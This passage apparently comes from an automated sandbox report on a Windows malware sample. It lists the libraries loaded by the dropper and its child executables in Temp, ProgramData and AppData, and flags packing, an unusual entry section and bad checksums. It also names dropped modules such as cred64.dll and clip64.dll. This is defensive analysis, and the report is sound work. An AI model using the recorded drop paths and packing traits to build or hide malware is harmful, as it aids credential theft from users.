Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office Jump to behavior
Source: UeW2b6mU6Z.exe Static file information: File size 3102720 > 1048576
Source: UeW2b6mU6Z.exe Static PE information: Raw size of ldcfgzdi is bigger than: 0x100000 < 0x2c3400
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: agement.Automation.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb< source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: powershell.exe, 0000001D.00000002.2649486019.000001CA6D701000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.pdbC source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D6A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.Core.pdb source: powershell.exe, 0000001D.00000002.2649122722.000001CA6D6D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Management.pdbpdbent.pdb source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000001D.00000002.2646507440.000001CA6D698000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Unpacked PE file: 0.2.UeW2b6mU6Z.exe.c40000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.ad0000.1.unpack :EW;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ldcfgzdi:EW;thopgwrw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Unpacked PE file: 12.2.amert.exe.d00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Unpacked PE file: 16.2.chrosha.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mxcnarui:EW;nxgghrcb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Unpacked PE file: 20.2.590971cd60.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 38.2.MPGPH131.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 40.2.MPGPH131.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 46.2.RageMP131.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Unpacked PE file: 55.2.590971cd60.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW; vs :ER;.rsrc:W;.idata :W; :EW;kiragzej:EW;cquspnza:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: UeW2b6mU6Z.exe Static PE information: real checksum: 0x2f5a1c should be: 0x2f7366
Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: clip64[2].dll.16.dr Static PE information: real checksum: 0x0 should be: 0x2272f
Source: amert.exe.6.dr Static PE information: real checksum: 0x1dc6c6 should be: 0x1dbe20
